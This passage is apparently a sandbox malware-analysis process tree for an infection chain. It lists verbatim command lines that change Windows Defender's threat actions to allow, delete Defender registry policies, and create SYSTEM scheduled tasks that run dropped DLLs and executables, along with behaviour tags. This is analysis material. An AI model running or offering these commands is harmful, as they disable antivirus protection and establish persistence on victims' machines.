/NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &3⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True6⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Blocklisted process makes network request
- Executes dropped EXE
- Modifies Internet Explorer settings
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bOoGaaDxESFbryPOAb"3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\dIBxqmZBU\qVXSTQ.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "JnrJAucJILlcMMe" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "JnrJAucJILlcMMe2" /F /xml "C:\Program Files (x86)\dIBxqmZBU\mmzEkBE.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "JnrJAucJILlcMMe"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "JnrJAucJILlcMMe"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "OMsCZDeJImgVgl" /F /xml "C:\Program Files (x86)\fSairMrhYOPU2\iHYKFbB.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "uZdEDCeaKQjVo2" /F /xml "C:\ProgramData\qLBAJgyZHGjWrPVB\pmQrYUb.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "FNTeCqGkBmjmyLdgG2" /F /xml "C:\Program Files (x86)\VqGHeIeUCewIVtFOQeR\XIeUzOL.xml" /RU "SYSTEM"3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "OBEOfgleGlpbUoFbTOD2" /F /xml "C:\Program Files (x86)\iOPoQDDXUfpqC\FrwjkHz.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "PvKMXtxeDKBRRtMew" /SC once /ST 05:36:55 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\laRuxdflOdEFherP\lmIlXovV\iLTNMHm.dll\",#1 /site_id 739435" /V1 /F3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "PvKMXtxeDKBRRtMew"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "spuRERNvqitL" /SC once /ST 07:41:37 /F /RU "Admin" /TR "\"C:\Users\Admin\AppData\Local\Temp\dQmOBORtOOmVIQYxa\ZJmNNaQo\hjKQMrj.exe\" JB /S"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "spuRERNvqitL"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "spuRERNvqitL"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "spuRERNvqitL"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "JoozO1" /SC once /ST 04:39:01 /F /RU "Admin" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" --restore-last-session"3⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "JoozO1"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "JoozO1"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:324⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:644⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "fHOlMGNmDutpzGekG"3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
- Executes dropped EXE
-
C:\Windows\Temp\laRuxdflOdEFherP\ucdSBUUSaCLPRkL\abLzenc.exeC:\Windows\Temp\laRuxdflOdEFherP\ucdSBUUSaCLPRkL\abLzenc.exe Nv /site_id 394347 /S2⤵
- Checks computer location settings
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &3⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True5⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True7⤵
- Checks computer location settings
- Checks whether UAC is enabled
- Drops file in Windows directory
- Modifies Control Panel
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bOoGaaDxESFbryPOAb"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\dIBxqmZBU\YkvsFn.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "JnrJAucJILlcMMe" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "JnrJAucJILlcMMe2" /F /xml "C:\Program Files (x86)\dIBxqmZBU\MUxabrz.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "JnrJAucJILlcMMe"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "JnrJAucJILlcMMe"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "OMsCZDeJImgVgl" /F /xml "C:\Program Files (x86)\fSairMrhYOPU2\uvrUIbH.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "uZdEDCeaKQjVo2" /F /xml "C:\ProgramData\qLBAJgyZHGjWrPVB\TdXDTej.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "FNTeCqGkBmjmyLdgG2" /F /xml "C:\Program Files (x86)\VqGHeIeUCewIVtFOQeR\qUmvKit.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "OBEOfgleGlpbUoFbTOD2" /F /xml "C:\Program Files (x86)\iOPoQDDXUfpqC\WktMODE.xml" /RU "SYSTEM"3⤵
- Blocklisted process makes network request
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "spuInCFFcSJc" /SC once /ST 07:20:25 /F /RU "Admin" /TR "\"C:\Users\Admin\AppData\Local\Temp\dQmOBORtOOmVIQYxa\EOQqLsho\IqRhcst.exe\" JB /S"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "spuInCFFcSJc"3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "spuInCFFcSJc"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "spuInCFFcSJc"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:324⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:644⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "fHOlMGNmDutpzGekG"3⤵
- Modifies Internet Explorer settings
-
\??\c:\windows\system32\rundll32.EXEc:\windows\system32\rundll32.EXE "C:\Windows\Temp\laRuxdflOdEFherP\lmIlXovV\iLTNMHm.dll",#1 /site_id 7394352⤵
-
C:\Windows\SysWOW64\rundll32.exec:\windows\system32\rundll32.EXE "C:\Windows\Temp\laRuxdflOdEFherP\lmIlXovV\iLTNMHm.dll",#1 /site_id 7394353⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "PvKMXtxeDKBRRtMew"4⤵
-
C:\Users\Admin\AppData\Local\Temp\dQmOBORtOOmVIQYxa\ZJmNNaQo\hjKQMrj.exeC:\Users\Admin\AppData\Local\Temp\dQmOBORtOOmVIQYxa\ZJmNNaQo\hjKQMrj.exe JB /S2⤵
- Modifies Internet Explorer settings
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &3⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True6⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True6⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True6⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True6⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Users\Admin\AppData\Local\Temp\dQmOBORtOOmVIQYxa\EOQqLsho\IqRhcst.exeC:\Users\Admin\AppData\Local\Temp\dQmOBORtOOmVIQYxa\EOQqLsho\IqRhcst.exe JB /S2⤵
- Modifies Internet Explorer settings
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &3⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
